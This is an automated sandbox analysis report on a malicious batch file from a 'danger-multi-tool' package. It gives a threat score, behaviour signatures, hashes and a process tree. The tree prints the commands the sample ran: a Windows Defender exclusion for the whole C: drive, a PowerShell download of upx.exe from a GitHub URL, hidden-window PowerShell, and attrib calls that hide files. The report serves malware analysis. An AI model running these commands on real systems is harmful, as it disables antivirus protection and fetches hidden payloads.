Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2024 10:29

General

  • Target

    danger-multi-tool-main/start.bat

  • Size

    30KB

  • MD5

    7ba955995f65ce6b05a74ee4515749cb

  • SHA1

    2710d30d8077a3c72cd819fbe7cc8b52188b57db

  • SHA256

    eaf6f1b53d2b7e04b7a1250ccae7fa440fef762b243b58de3fad89d797143cc7

  • SHA512

    6d4b7be5872b6762e922c925e9566d3751ad0bf5f745f00462c6c6c5e98bacc14e2bd16ef379bcf4d75167aeb088571efe957279d3b330e864ef439e743da2ac

  • SSDEEP

    48:9gros7BK7cp3zI8FpIJp/4eai2gF9H2YHwvfol2+:9gO4dI8ihXf

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\start.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2184
    • C:\Windows\system32\mode.com
      mode con: cols=100 lines=30
      2⤵
        PID:2788
      • C:\Windows\system32\rundll32.exe
        "C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\main.py
        2⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:2892
        • C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
          "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\main.py"
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of SetWindowsHookEx
          PID:1140
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -window hidden -command ""
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\system32\cacls.exe
        "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
        2⤵
          PID:2616
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -command "Add-MpPreference -ExclusionPath "C:\
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2648
        • C:\Windows\system32\attrib.exe
          attrib +h "Anon" /s /d
          2⤵
          • Views/modifies file attributes
          PID:856
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Powershell -Command "Invoke-Webrequest 'https://raw.githubusercontent.com/sfd11/Nitro-Generator/refs/heads/main/src/utils/upx.exe' -OutFile upx.exe"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1464
        • C:\Windows\system32\attrib.exe
          attrib +h "C:\Users\Admin\AppData\Local\Anon\upx.exe" /s /d
          2⤵
          • Views/modifies file attributes
          PID:2396

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

        Filesize

        3KB

        MD5

        ccfb13aa3273329ce78b48cc7557097d

        SHA1

        f3eb0a86473de0765e7c41e6a79f8f871ec9abd4

        SHA256

        4763771c8a8d3a3e4a05d7b452587c8b9ff4d1e5253f17c5b6b18493e894afe3

        SHA512

        8195de99dd6842dbcadc9de64f8abbeba69340fbfb4e86026cee9de153d1c3b044e2680f64abc2d74867fa53989799b7215feeb3b8e5072392f7b867fa9278a2

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

        Filesize

        7KB

        MD5

        795a0f161aad2456d0e623a11974f165

        SHA1

        437f11446c576504569f54c4c050fe694df74a2e

        SHA256

        00594d902f414e5206892443df902fce8126967a92beb06342520ac26f9e0efb

        SHA512

        ee40be48246dfe9d9d136d29d6cd2f1deabc3a4678defa4fd82095ff1ea2c1228fc22cd854c10c605e8b628c4c43ec7f4d5704ccf5293fb0727d661c6fa75aa0

      • memory/2648-35-0x000000001B580000-0x000000001B862000-memory.dmp

        Filesize

        2.9MB

      • memory/2648-36-0x0000000002070000-0x0000000002078000-memory.dmp

        Filesize

        32KB

      • memory/2664-28-0x000000001B600000-0x000000001B8E2000-memory.dmp

        Filesize

        2.9MB

      • memory/2664-29-0x0000000001E50000-0x0000000001E58000-memory.dmp

        Filesize

        32KB